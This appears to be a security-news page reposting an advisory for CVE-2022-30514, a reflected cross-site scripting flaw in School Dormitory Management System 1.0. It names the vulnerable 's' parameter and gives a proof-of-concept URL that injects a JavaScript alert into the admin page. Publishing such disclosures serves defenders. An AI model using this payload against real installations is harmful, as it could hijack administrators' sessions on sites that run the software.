Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-30514: GitHub - bigzooooz/CVE-2022-30514: School Dormitory Management System 1.0 - Reflected XSS

School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:126.

CVE
#xss#vulnerability#ubuntu#git#php#auth

CVE-2022-30514

School Dormitory Management System 1.0 - Reflected XSS

Exploit Title: School Dormitory Management System 1.0 - Reflected XSS****Date: 2022-05-25****CVE: CVE-2022-30514****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html****Version: 1.0****Tested on: LAMP, Ubuntu

[#] Vulnerability Location:

$_GET[‘s’] in /dms/admin/inc/navigation.php:126

[#] Exploitation :

http://localhost/dms/admin/?s=%27;%20alert(%22b4zb0z%22);%20s=%27

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907